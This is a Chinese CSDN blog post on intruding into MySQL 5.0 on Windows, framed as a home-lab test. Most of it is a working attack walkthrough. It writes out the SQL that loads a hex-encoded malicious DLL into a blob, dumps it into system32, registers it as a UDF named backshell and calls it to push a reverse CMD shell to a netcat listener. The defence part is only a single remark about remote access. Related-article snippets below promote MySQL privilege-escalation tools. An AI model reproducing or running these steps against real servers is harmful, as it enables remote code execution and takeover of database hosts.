mysql 入侵_mysql5.0入侵测试以及防范方法分享

最新推荐文章于 2021-03-12 16:42:15 发布
最新推荐文章于 2021-03-12 16:42:15 发布
阅读量205 收藏
点赞数
文章标签: mysql 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36349685/article/details/113135104
版权

在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。

总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7

虚拟机:XP

给予mysql远程权限:

grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';

flush privileges;

给物理机远程权限:

d0c0bad00f964f9b3c2f48133dfb4823.png

物理机成功连接上:

4eb6f1d934ab25b9544925202459d543.png

执行侵入测试前(有图有真相):

12e6f460d615b10306c8f4b1f02b274a.png

执行侵入测试后(有图有真相):

be083e293e5086bd4dea987d8be5799d.png

重启前(有图有真相):

1194ac308c6356b5b0f46f4ab84c821e.png

重启后(有图有真相):

88f40d57fc76813596c5f9cae116dc4d.png

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

f7abd1d0800b22fcf2247598655ce295.png

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell("物理机IP",端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

yyd.txt大概内容:

et @a=concat('',

0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);

create table yyd(data LONGBLOB);

insert into yyd values("");updateyyd set data = @a;

select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';

CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';

正题之三:

防范

e8b70a5fc2497ba99b09c80822d09002.png

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

Aworl-ri
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过mysql入侵win主机_通过mysql入侵NT和win2000_MySQL
weixin_33958871的博客
02-05 213
bitsCN.com许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而IIS的一些其他漏洞导致源代码泄漏也可能看到数据库的账号和密码。假设我们已经拿到了数据库的密码,看看我们如何通过mysql数据库来获得该机器的一定权限。首先通常情况下,一般mysql和php配合使用,大多数NT和...
mysql5.0入侵测试以及防范方法分享
09-10
MySQL 5.0 入侵测试防范方法分享 首先,MySQL 5.0 入侵测试是指攻击者尝试访问和控制 MySQL 服务器的行为,而防范方法则是指保护 MySQL 服务器免受恶意攻击的措施。本文将详细介绍 MySQL 5.0 入侵测试方法和...
暗月mysql全版本通杀提权神器-V2014
01-13
暗月mysql全版本通杀提权神器-V2014,亲测真实有效,可用。如有侵权,请联系CSDN管理员删除即可
mysql提权 入侵提权软件_【技术】3306端口手动入侵mysql写入启动项提权
weixin_30641571的博客
01-18 523
来源:飓风网络安全作者:钊涣原址:http://mp.weixin.qq.com/s/PR1KctJzKPGytNPPrU39uA1、连接到对方MYSQL 服务器。首先你要下载下载下来然后解压到C盘根目录,找到MySQL-5.1.50这个文件夹,再打开bin文件夹1、打开本地cmd命令提示框,输入命令cd C:\MySQL-5.1.50\bin 意思就是进入当前目录。然后就可以输入mysql命...
3306-批量Mysql提权,3306端口:手动入侵mysql写入启动项提权
weixin_35702533的博客
03-12 541
1、连接到对方MYSQL 服务器。首先你要下载phpnow百度有下载下来然后解压到C盘根目录,找到MySQL-5.1.50这个文件夹,再打开bin文件夹1、打开本地cmd命令提示框,输入命令cd C:\MySQL-5.1.50\bin 意思就是进入当前目录。然后就可以输入mysql命令了。然后输入:mysql -u 目标用户名,3306默认是root -h 目标ip地址 -p 回车例如:mys...
mysql提权入侵服务器_Mysql提权拿服务器
weixin_39606911的博客
02-02 454
最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。 接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。dedecms一般都在data目...
MySQL_5.0_Reference_Manual.rar_MySQL 5.0 Manu_mysql 5.0_mysql5.0
最新发布
09-24
该文档的MySQL 5.05.0.64版本。MySQL是一个开放源码的小型关系数据库管理系统,开发者为瑞典MySQL AB公司。目前MySQL被广泛地应用在Internet上的中小型网站中。由于其体积小、速度快、总体拥有成本低,尤其是开放...
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
本压缩包"MYSQL_UDF-5.0.rar"包含了关于MySQL UDF的资源,特别是针对版本5.0的相关内容。 在MySQL中,UDF可以分为几种类型,包括标量函数、聚合函数和表值函数。标量函数返回单个值,如数学运算或字符串操作;聚合...
mysql-manager.zip_mysql manager 5.0
09-19
MySQL Manager 5.0 是一款专为MySQL数据库管理系统设计的工具,它提供了用户友好的图形界面,便于管理和操作MySQL数据库。这款软件是基于MySQL 5.0版本开发的,因此与该版本的数据库服务器有着最佳的兼容性和性能...
Navicat_Keygen_Patch_v5.0_By_DFoX_CHS.rar
06-20
5.0版本对win10比较友好;win7可能多次会不成功。如果不成功请看我主页降级到低版本;
基于MySQL的SQL注入攻击(20191202232232).pdf
12-02
MySQL的SQL注入攻击(SEC-W05-003.1) 注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,可能 B/S模式应用开发的发展
mysql入侵服务器_记通过mysql数据库成功入侵到服务器内部的渗透实战
weixin_33127399的博客
01-19 1207
1,在成功进入mysql到数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
通过mysql命令 入侵_通过mysql入侵全过程.doc
weixin_29322049的博客
01-19 323
您所在位置:网站首页 > 海量文档&nbsp>&nbsp计算机&nbsp>&nbspPHP资料通过mysql入侵全过程.doc7页本文档一共被下载:次,您可全文免费在线阅读后下载本文档。 下载提示1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。2.该文档所得收入(下载+...
linux系统mysql入侵_Linux最强免费入侵检测工具,只需3步随时监测数据安全!
weixin_30802125的博客
02-07 247
互联网高速发展的今天,每天网络环境中都会产生数以亿计的攻击。严重的网络崩溃,亦或网页被篡改,使得企业互联网业务瘫痪。作为一名合格的Linux运维程序员,你是如何察觉互联网业务已遭受攻击的呢?今天就跟大家推荐一个能够随时检测Linux入侵的小工具~AIDE(Advanced Intrusion Detection Environment)是一款针对文件和目录进行完整性对比检查的程序,是Tripwir...
Mysql被黑客入侵及安全措施总结
lovemysea的专栏
03-06 3241
情况概述今天登陆在腾讯云服务器上搭建的Mysql数据库,发现数据库被黑了,黑客提示十分明显。Mysql中只剩下两个数据库,一个是information_schema,另一个是黑客创建的PLEASE_READ,其中有一张info表,内容如下:Info: Your DB is Backed up at our servers, to restore send 0.2 BTC to the Bitcoi...
教你一些MySQL数据库入侵及防御方法
老班长的博客
09-05 5773
一、MySQL 信息收集 1、端口信息收集 MySQL 默认端口是 3306 端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: d47e62d2b349aca45e42305ed6714efbe5ed61d9iisputter,直接填写 3306 端口,IP 地址填写单个或者 C 段地址; d47e62d2b349aca45e42305ed6714efbe5ed...
MYSQL入侵的一种思路
weixin_34187822的博客
11-12 270
(1)扫描MySQL口令,进行连接查看表中内容,结合web实施控制。 (2)执行vbs命令,将vbs命令写入到数据库表中,然后导入到启动中,不过这个目前还没有测试成功。网上有,但其脚本有问题。 (3)查看Mysql版本,通过可溢出工具直接溢出并提升权限。这个没有做,可以搜集资料作一些测试很研究。 本文转自 simeon2005 ...
mysql命令入侵_My SQL防入侵方法大全_MySQL
weixin_39883208的博客
01-19 194
MYSQL用户ROOT密码为空时是一个很大的漏洞,在网上也有许多一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??后来,自己思索想到一个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe...
01-MySQL_C_API-编程实践.docx
03-06
通过一步步的实例讲解和代码演示,读者可以清晰地了解 MySQL C API 的基本原理和操作方法,并且能够在实际项目中灵活应用。通过这份文档的学习,读者可以为进一步的深入学习和项目开发打下良好的基础,为自己的编程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值